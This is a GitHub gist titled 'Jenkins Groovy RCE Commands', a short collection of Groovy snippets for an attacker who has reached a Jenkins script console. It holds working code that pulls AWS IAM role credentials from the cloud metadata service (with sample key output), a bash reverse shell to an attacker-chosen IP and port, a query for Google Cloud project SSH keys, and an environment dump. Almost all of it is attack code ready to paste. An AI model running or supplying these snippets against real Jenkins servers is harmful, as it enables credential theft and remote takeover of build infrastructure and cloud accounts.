Skip to content

Instantly share code, notes, and snippets.

@random-robbie

random-robbie/jenkins.md

Last active May 28, 2020 10:47
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save random-robbie/f47039501f8df000a4ff7353f3a05848 to your computer and use it in GitHub Desktop.
Save random-robbie/f47039501f8df000a4ff7353f3a05848 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
jenkins.md

Jenkins Groovy RCE Commands

AWS IAM ROLE KEYS

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   def proc = command.execute()
   proc.waitFor()
   

def command2 = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/${proc.in.text}/"
   def proc2 = command2.execute()
   proc2.waitFor()

   println "Process exit code: ${proc2.exitValue()}"
   println "Std Err: ${proc2.err.text}"
   println "Std Out: ${proc2.in.text}"

This should print the IAM role keys

Process exit code: 0
Std Err: 
Std Out: {
  "Code" : "Success",
  "LastUpdated" : "2018-10-08T15:36:01Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAXASDASDADSSAD7",
  "SecretAccessKey" : "iSnUqdsffsdfssfdfdsdfdsfNXutY",
  "Token" : "9QNiu+O/+kh6PvtfkDeh47h5eqvIGyiQ6HE+HqmgHtXRgXfdqduR5MdYOo9AzUsdffffffffffLQn6qzPj2sm7anG1v/S4EgP/sdrDOyHk9xeXV58o9PLt3QU=",
  "Expiration" : "2018-10-08T21:53:19Z"
}

Reverse Shell

Change your YOURIP for your IP and YOURPORT for your port.

Ensure you have NC running for the connect back.

def command = "bash -i >& /dev/tcp/YOURIP/YOURPORT 0>&1"
   def proc = command.execute()
   proc.waitFor()

   println "Process exit code: ${proc.exitValue()}"
   println "Std Err: ${proc.err.text}"
   println "Std Out: ${proc.in.text}"

Google Metadata Public SSH Keys

def command = "curl http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json"
   def proc = command.execute()
   proc.waitFor()

   println "Process exit code: ${proc.exitValue()}"
   println "Std Err: ${proc.err.text}"
   println "Std Out: ${proc.in.text}"

Print Enviorment - handy to see if it's a container!

def command = "printenv"
   def proc = command.execute()
   proc.waitFor()

   println "Process exit code: ${proc.exitValue()}"
   println "Std Err: ${proc.err.text}"
   println "Std Out: ${proc.in.text}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment